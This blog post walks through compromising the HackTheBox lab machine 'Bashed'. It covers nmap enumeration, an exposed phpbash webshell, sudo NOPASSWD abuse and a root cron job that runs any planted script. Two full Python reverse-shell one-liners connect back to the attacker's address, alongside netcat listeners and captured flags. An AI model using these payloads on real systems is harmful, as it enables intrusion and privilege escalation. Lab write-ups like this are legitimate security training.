Bashed – Hackthebox

Skills Required
Basic knowledge of Linux
Enumerating ports and services

Skills Learned
Very Basic scripting
Exploiting NOPASSWD
Exploiting cron jobs

START

I checked to see what ports were open:

Scanned all ports, scan with default NSE scripts (Considered useful for discovery and safe) and what version a service is running on that port.

[root:~]# nmap -p- -sC -sV 10.10.10.68
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-04 14:21 BST
Nmap scan report for 10.10.10.68
Host is up, received echo-reply ttl 63 (0.034s latency).
Not shown: 61550 closed ports, 3984 filtered ports
Reason: 61550 resets and 3984 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.52 seconds

Result: Port 80 is open and running Apache. There is a website called Arrexel’s Development Site.

Seeing as port 80 is open I ran this to perform HTTP enumeration using the http-enum nse script. I did this after I completed the box to see what what the command would output. From the looks of it if i did this initially i could have skipped the next step – using GoBuster.

[root:~]# nmap -Pn -p 80 --script http-enum 10.10.10.68
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-04 12:48 BST 
Nmap scan report for 10.10.10.68 
Host is up, received user-set (0.032s latency).
PORT STATE SERVICE REASON 
80/tcp open http syn-ack ttl 63 
| http-enum: 
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /dev/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /php/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_ /uploads/: Potentially interesting folder
Nmap done: 1 IP address (1 host up) scanned in 4.50 seconds

You see similar results using GoBuster.

[root:~]# nmap -Pn -p 80 --script http-enum 10.10.10.68
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-04 12:48 BST 
Nmap scan report for 10.10.10.68 
Host is up, received user-set (0.032s latency).
PORT STATE SERVICE REASON 
80/tcp open http syn-ack ttl 63 
| http-enum: 
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /dev/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /php/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_ /uploads/: Potentially interesting folder
Nmap done: 1 IP address (1 host up) scanned in 4.50 seconds

Time to check out those directories. A dev directory is always interesting!!dev

Clicking on phpbash.php gave me a webshell. I wonder what i can do with this? My initial thoughts are uploading a reverse proxy.

phpbash

www-data@bashed:/var/www/html/dev# whoami
www-datawww-data@bashed:/var/www/html/dev# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/var/www/html/dev# ls -l
total 20
-rw-r-xr-x 1 root root 4688 Dec 4 12:21 phpbash.min.php
-rw-r-xr-x 1 root root 8280 Nov 30 23:56 phpbash.php
I’m logged on as www-data and have basic user privileges. I did sudo -l to see what other privileges i have access to. I am able to run commands as a user scriptmanager without a password.
www-data@bashed:/var/www/html/dev# sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
Interesting…
Based on the /home directories there are 2 basic users on this box.
www-data@bashed:/var/www/html/dev# cd /home
www-data@bashed:/home# ls
arrexel
scriptmanager
Lets see if I can get the user flag from this shell
www-data@bashed:/home# cd arrexel
www-data@bashed:/home/arrexel# ls
user.txt
www-data@bashed:/home/arrexel# cat user.txt
2c281f318555dbc1b856957c7147bfc1
User flag captured!
Using this shell (through firefox) was not easy. So i wanted see if i can get a reverse shell. I started a listener on my kali machine
[root:~]# nc -nlvp 5555
listening on [any] 5555 ...
And on the Firefox webshell on Bashed I ran
www-data@bashed:/# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.234",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Back on my kali machine i now had shell as www-data
[root:~]# nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.234] from (UNKNOWN) [10.10.10.68] 39788
/bin/sh: 0: can't access tty; job control turned off
$

It looks horrible and quite limited. I spawned a new tty shell by running the following

python -c 'import pty;pty.spawn("/bin/bash")'
New prompt
www-data@bashed:/var/www/html/dev$
That looks a bit better though it doesnt really give us more functionality ( that i can tell ).
After exploring the box a bit i found this really interesting
www-data@bashed:/$ ls -l
ls -l
total 80
drwxr-xr-x 2 root root 4096 Dec 4 11:22 bin
drwxr-xr-x 3 root root 4096 Dec 4 11:17 boot
drwxr-xr-x 19 root root 4240 Apr 1 14:08 dev
drwxr-xr-x 89 root root 4096 Dec 4 17:09 etc
drwxr-xr-x 4 root root 4096 Dec 4 13:53 home
lrwxrwxrwx 1 root root 32 Dec 4 11:14 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x 19 root root 4096 Dec 4 11:16 lib
drwxr-xr-x 2 root root 4096 Dec 4 11:13 lib64
drwx------ 2 root root 16384 Dec 4 11:13 lost+found
drwxr-xr-x 4 root root 4096 Dec 4 11:13 media
drwxr-xr-x 2 root root 4096 Feb 15 2017 mnt
drwxr-xr-x 2 root root 4096 Dec 4 11:18 opt
dr-xr-xr-x 148 root root 0 Apr 1 14:08 proc
drwx------ 3 root root 4096 Dec 4 13:03 root
drwxr-xr-x 18 root root 520 Apr 2 06:25 run
drwxr-xr-x 2 root root 4096 Dec 4 11:18 sbin
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Apr 4 04:26 scripts
drwxr-xr-x 2 root root 4096 Feb 15 2017 srv
dr-xr-xr-x 13 root root 0 Apr 2 04:53 sys
drwxrwxrwt 10 root root 4096 Apr 4 06:57 tmp
drwxr-xr-x 10 root root 4096 Dec 4 11:13 usr
drwxr-xr-x 12 root root 4096 Dec 4 11:20 var
lrwxrwxrwx 1 root root 29 Dec 4 11:14 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
www-data@bashed:/$
There’s something out of place here. The /scripts directory looks strange. Its not normally a directory that is on the root of a linux file system. Also the user scriptmanager is the only one that has access (excluding root – root always has access).
www-data@bashed:/$ cd scripts
cd scripts
bash: cd: scripts: Permission denied
www-data@bashed:/$
Just to confirm i tried to cd into the directory as www-data and got a permission denied! Dammit! I dont like not getting access to something. I need to think how I can get in.
I then remembered that I can sudo as scriptmanager, let’s use that privilege to view the /scripts directory
! Remember !
User www-data may run the following commands on bashed:
 (scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/$ sudo -u scriptmanager ls -al /scripts
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 18:06 .
drwxr-xr-x 23 root root 4096 Dec 4 13:02 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 17:03 test.py
-rw-r--r-- 1 root root 12 Feb 13 01:45 test.txt
My thoughts at this stage were – oh no i have to do some scripting! I took a closer look at the 2 files. Test.py is owned by scriptmanager and test.txt is owned by root. I looked inside test.py and test.txt.
www-data@bashed:/$ sudo -u scriptmanager cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing!")
f.close
www-data@bashed:/$ sudo -u scriptmanager cat /scripts/test.txt
testing!

It creates a “test.txt” file and write the string “testing!” in it. But why is test.txt is owned by root while test.py is owned by scriptmanager only?

At this stage i took a guess that there is a root cron job that runs and executes any scripts in the /scripts folder.

I checked to see what cron jobs were running but I couldn’t see anything that referenced the /scripts folder.

www-data@bashed:/$ crontab -l
crontab -l
no crontab for www-data
www-data@bashed:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@bashed:/$

After a few days on and off poking around this box. I was confused scared and lonely. I certainly ‘Bashed’ my head off a few walls (see what I did there?). I decided to look back at the /scripts folder. I took a guess at thinking there was a cron job that i couldnt see as www-data or scriptmanager that ran any scripts in that folder.

I created a tester.py containing the following and ran a netcat listener on port 6666

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.234",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
nc -nlvp 6666
listening on [any] 6666 ...
connect to [10.10.14.234] from (UNKNOWN) [10.10.10.68] 55864
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

BOOM!!!!!

I have to say I didn’t think this was going to work. For my own sanity i checked to see if there was a cron job that was running which i couldn’t see as other user. Sure enough

# crontab -l * * * * * cd /scripts; for f in *.py; do python "$f"; done #

All that’s left to do now is to capture the root flag

root@bashed:/scripts# cat /root/root.txt 
cc4f0afe3a1026d402ba10329674a8e2

FIN

Conclusion

If you made it this far down well done. It was a fun box and I learned quite a bit from it. What I didnt put in this blog was that I used another python reverse shell to log on as scriptmanager as i got fed up typing sudo -u scriptmanager then the command. It became quite a messy procedure after a while. Upon reflection I think it would have been better just to type the sudo -u command when i needed to use it as at times I had multiple shells open and it was hard to keep track of things.

Enough of my ramblings.

rowbot

Share

6 Responses

  1. Good note about the shell. I used a web shell and used ‘sudo -u scriptmanager bash’ and then just reloaded it if I ever needed it. For some reason I did find people removing my shell occasionally. Jerks haha. Great write up!

  2. I didn’t even use nmap or Gobuster for this box.
    I simply opened the webpage and read the two blog posts.
    One of them tells you that he developed PHPBash on this server, so I tried some possible dirs and quickly stumbled upon the shell 🙂

  3. FYI you could have issued this command from your www-data shell to become scriptmanager: sudo -i -u scriptmanager

Leave a Reply

Your email address will not be published. Required fields are marked *

Post comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.